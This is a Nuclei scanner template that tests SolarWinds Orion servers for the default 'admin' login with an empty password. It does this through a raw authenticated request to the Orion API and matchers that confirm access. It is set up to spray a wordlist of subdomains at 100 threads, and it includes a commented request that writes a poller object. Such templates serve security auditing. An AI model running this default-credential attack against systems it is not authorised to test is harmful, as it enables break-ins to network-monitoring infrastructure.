id: solarwinds-default-admin 2

info:
  name: SolarWinds Orion Default Credentials
  author: dwisiswant0
  severity: high
  tags: solarwinds,default-login

  # Optional:
  # POST /SolarWinds/InformationService/v3/Json/Create/Orion.Pollers HTTP/1.1
  # {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337}

  # References:
  # - https://github.com/solarwinds/OrionSDK/wiki/REST

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Authorization: Basic YWRtaW46
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Content-Type: application/json"
        part: header
      - type: regex
        regex:
          - "(totalRow|result|swi)s(:\\/\\/)?"
          - "(Orion\\.|Poller(ID)?)s?"
        condition: and
        part: body
      - type: status
        status:
          - 200
